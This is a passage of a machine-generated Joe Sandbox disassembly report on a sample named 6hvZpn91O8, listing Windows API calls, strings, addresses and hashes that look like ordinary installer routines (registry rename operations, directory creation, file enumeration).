                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                              • API String ID: 3864787166-2767913252
                                                                              • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                              • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                              • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                              • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID:
                                                                              • API String ID: 3887896539-0
                                                                              • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                              • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                              • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                              • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                              Strings
                                                                              • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                              • PendingFileRenameOperations, xrefs: 00454C70
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                              • WININIT.INI, xrefs: 00454D00
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                              • API String ID: 47109696-2199428270
                                                                              • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                              • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                              • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                              • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: $pI$.tmp$oI
                                                                              • API String ID: 1375471231-740224434
                                                                              • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                              • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                              • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                              • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                              APIs
                                                                              • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                              • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                              • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID: lAB
                                                                              • API String ID: 4191631535-3476862382
                                                                              • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                              • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                              • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                              • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                              APIs
                                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDeleteHandleModuleProc
                                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                                              • API String ID: 588496660-1846899949
                                                                              • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                              • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                              • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                              • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveChangeNotifyWindow
                                                                              • String ID: $Need to restart Windows? %s
                                                                              • API String ID: 1160245247-4200181552
                                                                              • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                              • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                              • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                              • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                              APIs
                                                                                • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                              • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                              • String ID: Creating directory: %s
                                                                              • API String ID: 2451617938-483064649
                                                                              • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                              • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                              • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                              • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressByteCharMultiProcWide
                                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                                              • API String ID: 2508298434-591603554
                                                                              • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                              • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                              • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                              • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                              • RegisterClassA.USER32(?), ref: 004164DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoRegisterUnregister
                                                                              • String ID: @
                                                                              • API String ID: 3749476976-2766056989
                                                                              • Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                              • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                              • Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                              • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                              APIs
                                                                              • 74D41520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                              • 74D41500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                              • 74D41540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: D41500D41520D41540
                                                                              • String ID: j]I
                                                                              • API String ID: 2153611984-3121892809
                                                                              • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                              • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                              • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                              • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastProcess
                                                                              • String ID: XtE$ptE
                                                                              • API String ID: 2919029540-3149052308
                                                                              • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                              • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                              • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                              • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                              APIs
                                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 395431579-1506664499
                                                                              • Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                              • Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
                                                                              • Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
                                                                              • Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
                                                                              Strings
                                                                              • PendingFileRenameOperations2, xrefs: 00454F6B
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
                                                                              • PendingFileRenameOperations, xrefs: 00454F5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                              • API String ID: 47109696-2115312317
                                                                              • Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                              • Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
                                                                              • Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
                                                                              • Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
                                                                              • FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
                                                                              • FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                              • Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
                                                                              • Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
                                                                              • Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
                                                                              • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
                                                                              • FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
                                                                              Memory Dump Source
